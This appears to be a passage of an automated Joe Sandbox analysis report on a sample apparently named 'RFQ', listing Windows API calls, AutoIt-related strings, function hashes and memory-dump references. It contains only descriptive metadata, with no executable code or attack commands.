                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                                    • Opcode ID: aa20783fb9e9e5889cb795a1b469c5babbc5b54ada729943890d2118de2aba43
                                                                                                                                                    • Instruction ID: 0839b90d98b9879880740367c41fae5bdb17ff27ec110741aa4e01b7c49c5016
                                                                                                                                                    • Opcode Fuzzy Hash: aa20783fb9e9e5889cb795a1b469c5babbc5b54ada729943890d2118de2aba43
                                                                                                                                                    • Instruction Fuzzy Hash: F8E0ED35104248AADB315B68AC0DFD83B11AB56336F14C766F66A980E1E7798D81DB11
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076B2DF
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0076B2EB
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0076B2F4
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0076B2FC
                                                                                                                                                      • Part of subcall function 0076AB24: GetProcessHeap.KERNEL32(00000000,?,0076A848), ref: 0076AB2B
                                                                                                                                                      • Part of subcall function 0076AB24: HeapFree.KERNEL32(00000000), ref: 0076AB32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: 7199527cda05f9f4964dc793292af6400692d7ca6aca9e1d6bbeebae6288ce93
                                                                                                                                                    • Instruction ID: 1012141120d522a4a39a35e848e40d5589285ffb1c0f12bbc340a9ed466a104c
                                                                                                                                                    • Opcode Fuzzy Hash: 7199527cda05f9f4964dc793292af6400692d7ca6aca9e1d6bbeebae6288ce93
                                                                                                                                                    • Instruction Fuzzy Hash: BDE0B63A104005FBCB112BA5EC08D99FBA6FF88321714C322F62582571DB3AA871EF95
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: 22d12057b854eae7b15c7b2ef890c224e1c4666bfefc2937d5b338a74c794933
                                                                                                                                                    • Instruction ID: cb0893e9e695f8906d69a5e1118d55d610c3723e4301e30fab6d1fd29b5704cc
                                                                                                                                                    • Opcode Fuzzy Hash: 22d12057b854eae7b15c7b2ef890c224e1c4666bfefc2937d5b338a74c794933
                                                                                                                                                    • Instruction Fuzzy Hash: 56E012B5500204EFDB205F708888B6E7BA9EB4C394F11CA1AFC5A8B251EB7C9C418B58
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: ad1809411887cf581c0db5a31268a3588ef57fb7314d74909412d5936d5b61b0
                                                                                                                                                    • Instruction ID: 13ebd484fb6dc3b3be0a75b65defd7e1e1b854b9622e3e1b9de7f378e61cb5b6
                                                                                                                                                    • Opcode Fuzzy Hash: ad1809411887cf581c0db5a31268a3588ef57fb7314d74909412d5936d5b61b0
                                                                                                                                                    • Instruction Fuzzy Hash: 73E04FB5500200EFDB105F70C84CA2D7BA9EB4C394F11C515FD5A87211EB7C9C018B14
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0076DEAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
APIs
Strings
Similarity
• API ID: _wcscpy
• String ID: I/z$I/z
• API String ID: 3048848545-4222651952
APIs
• Sleep.KERNEL32(00000000), ref: 0074BCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 0074BCF3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
• Part of subcall function 007344ED: __fread_nolock.LIBCMT ref: 0073450B
• _wcscmp.LIBCMT ref: 0077C65D
• _wcscmp.LIBCMT ref: 0077C670
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0079A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0079A86F
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0079980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0079984A
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 007751C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00775201
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __snwprintf
                                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                    • API String ID: 2391506597-2584243854
                                                                                                                                                    • Opcode ID: 0124cef69014ff49ce6da118dccce09ed4f3354ea42184546e480d332635f952
                                                                                                                                                    • Instruction ID: d2d03b52bfbec188c299c0210e40fd5552050cb835c88d6fe621b962984322cc
                                                                                                                                                    • Opcode Fuzzy Hash: 0124cef69014ff49ce6da118dccce09ed4f3354ea42184546e480d332635f952
                                                                                                                                                    • Instruction Fuzzy Hash: 8A216F71740158FFDF11EFA4D886EAD77B4AF48740F004469F505AB142EB78EA45CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0079945C
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00799467
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Combobox
                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                    • Opcode ID: 4da2d81214fbd0f1dc6e39c4aa94d82e5a31fb3f2b070066ddaeb73418d70722
                                                                                                                                                    • Instruction ID: 764ff6d704abe9883d51872958b195d9fa995cfc4dfba11fa01ebb6da0f2c2fa
                                                                                                                                                    • Opcode Fuzzy Hash: 4da2d81214fbd0f1dc6e39c4aa94d82e5a31fb3f2b070066ddaeb73418d70722
                                                                                                                                                    • Instruction Fuzzy Hash: 02119B71310548AFFF21DF58EC81EBB376EEB583A4F104129FA15972A0D679DC518760
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • GetActiveWindow.USER32 ref: 0079DA7B
                                                                                                                                                    • EnumChildWindows.USER32(?,0079D75F,00000000), ref: 0079DAF5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                    • String ID: T1x
                                                                                                                                                    • API String ID: 3814560230-209166786
                                                                                                                                                    • Opcode ID: 425ea60d178afa16f31262431848a760e97a29253f33b6644465409fd6c5ce07
                                                                                                                                                    • Instruction ID: b9ece02572fa2fd23843a5bc5e8091ae99ec51dc3b59dd19634a65ee53e6a3fc
                                                                                                                                                    • Opcode Fuzzy Hash: 425ea60d178afa16f31262431848a760e97a29253f33b6644465409fd6c5ce07
                                                                                                                                                    • Instruction Fuzzy Hash: 7B213975204205DFCB24DF68E850AA6B3E5EF59320F654619E96AC73E0DB38AC10CF64
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
                                                                                                                                                      • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
                                                                                                                                                      • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00799968
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00799982
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                    • Opcode ID: 2c52d72bb72adadd0c80a63dfe6130fe030dd81281af6eae00c236dc26738489
                                                                                                                                                    • Instruction ID: cd0c25ab79ab42043b6403b5517de51f0ef6ab7ab6e2dccd0d98532a3c7d8004
                                                                                                                                                    • Opcode Fuzzy Hash: 2c52d72bb72adadd0c80a63dfe6130fe030dd81281af6eae00c236dc26738489
                                                                                                                                                    • Instruction Fuzzy Hash: F8111472520209AFDF14DFB8D845AEA7BA8FB48354F01462CFA55E2250E739E850DB60
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00799699
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007996A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                    • Opcode ID: 920ab0446342091f2bf67967643c20738f657642a51545a14b571984b1011259
                                                                                                                                                    • Instruction ID: 3e00ea50bf2522735dd763a6be59bb5330fe51572d62c6949aed07a676d817d6
                                                                                                                                                    • Opcode Fuzzy Hash: 920ab0446342091f2bf67967643c20738f657642a51545a14b571984b1011259
                                                                                                                                                    • Instruction Fuzzy Hash: 40118C71500108ABFF209F68EC44EEB3B6AEB053B8F504328FA65931E0C73ADC509764
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007752D5
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007752F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: c36f0bf713006819fc769de2ef1fd8517de8659cef17b024344c9346d00a6aa3
                                                                                                                                                    • Instruction ID: fa86fd1a5ae02448cf527ed796caf190098ebdc584d357839f5b98604873e381
                                                                                                                                                    • Opcode Fuzzy Hash: c36f0bf713006819fc769de2ef1fd8517de8659cef17b024344c9346d00a6aa3
                                                                                                                                                    • Instruction Fuzzy Hash: 9311D072A01614EBDF20DB98DD04BA977B9AB067D4F048125E90DE72A0E3F8AD04C7A0
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00784DF5
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00784E1E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                    • Opcode ID: 2561e58d1a3dc1b089a300bd45efb6bba7dce9f8c4520de491fa936a854a4d06
• Instruction ID: 186099a7c5e453b699d994e49742ecd9a6c83e3b3b32519bc7b229c76eb596a1
• Opcode Fuzzy Hash: 2561e58d1a3dc1b089a300bd45efb6bba7dce9f8c4520de491fa936a854a4d06
• Instruction Fuzzy Hash: 9C117070641222FBDB259F51CC89EFBFAA8FF16755F10822AF61596140E7B85940C7F0
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
• htons.WSOCK32(00000000,?,00000000), ref: 0078A88B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: c73edfe2a06ed201c93ec9365b5bdd20673a8e1f9706ec2804a1e55f0ba195fc
• Instruction ID: 29c6a029aad33a7c036446ef4e5021a37a658919a6c13a7a54b054fe49919152
• Opcode Fuzzy Hash: c73edfe2a06ed201c93ec9365b5bdd20673a8e1f9706ec2804a1e55f0ba195fc
• Instruction Fuzzy Hash: 4401F975240305BBDB22EF64C84AFADB364EF44310F108527F5169B2D1D779E801C766
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0076B7EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 895eda124116d60ee8539d8de4ec1109093efdc6a0ecfd54579315460b9a6cb4
• Instruction ID: 2aa4a247b0811195d1eb5fb98f32f817193d2d30945b037cec26f818553bdc4e
• Opcode Fuzzy Hash: 895eda124116d60ee8539d8de4ec1109093efdc6a0ecfd54579315460b9a6cb4
• Instruction Fuzzy Hash: B201F1B1A41118EBDB05EBA4CC569FE73A9AF56350B000619F863A32C3EB7858188B90
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 0076B6EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: ec41714eb50a9737db086b7bb630e6cbbfc3e357d875ff9cb0997a52e3e10ba5
• Instruction ID: 3f0df3134f45743105128c757516cc8bf8093a79b0a202cbd2562fb3c75cf574
• Opcode Fuzzy Hash: ec41714eb50a9737db086b7bb630e6cbbfc3e357d875ff9cb0997a52e3e10ba5
• Instruction Fuzzy Hash: 3C01A2B1A41008ABDB15EBA4C956FFE73AD9F0A344F140029B903B3193EB5C5E188BB5
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 0076B76C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 76a1b8a28ecb798f93899142b14681c7bdabba01d105c85caa1189bfe637752d
• Instruction ID: 7658efbe4cf3354764948dd919e6db2433c91380b0a8ea83e2888c5c47ba2f4f
• Opcode Fuzzy Hash: 76a1b8a28ecb798f93899142b14681c7bdabba01d105c85caa1189bfe637752d
• Instruction Fuzzy Hash: 8C01D6B1A41104EBDB11E7A4C916FFE73AC9B06344F10002ABC03B3193EB6C5E1987B5
APIs
• LoadImageW.USER32(00730000,00000063,00000001,00000010,00000010,00000000), ref: 00734048
• EnumResourceNamesW.KERNEL32(00000000,0000000E,007767E9,00000063,00000000,75A90280,?,?,00733EE1,?,?,000000FF), ref: 007A41B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: EnumImageLoadNamesResource
• String ID: >s
• API String ID: 1578290342-1828237159
• Opcode ID: ac095177c5c3c0b1face34668ca6d469879919bdc8c439296e88e9887362caaf
• Instruction ID: f295503b4fa49182d9138439c94581e610a92ac94e2714dbd735a0b8f969e07b
• Opcode Fuzzy Hash: ac095177c5c3c0b1face34668ca6d469879919bdc8c439296e88e9887362caaf
• Instruction Fuzzy Hash: DFF09671740314F7E6344B1AFC46FE23B99E745BB5F508506F224D61D0D2F99480CA98
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 352d2c073c40139d63e6e965740a7801a5998123b3eb20938f86fa1ef1a7339e
• Instruction ID: 8d7d334f55a8adb10477f680d834cb45cf80055295b0f4e76050f53639c63ea6
• Opcode Fuzzy Hash: 352d2c073c40139d63e6e965740a7801a5998123b3eb20938f86fa1ef1a7339e
• Instruction Fuzzy Hash: CCE0227360022467DB20EAA59C09FC7FBACAB507A4F00412AB904D7041E678AA00C7D4
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0076A63F
  • Part of subcall function 007513F1: _doexit.LIBCMT ref: 007513FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
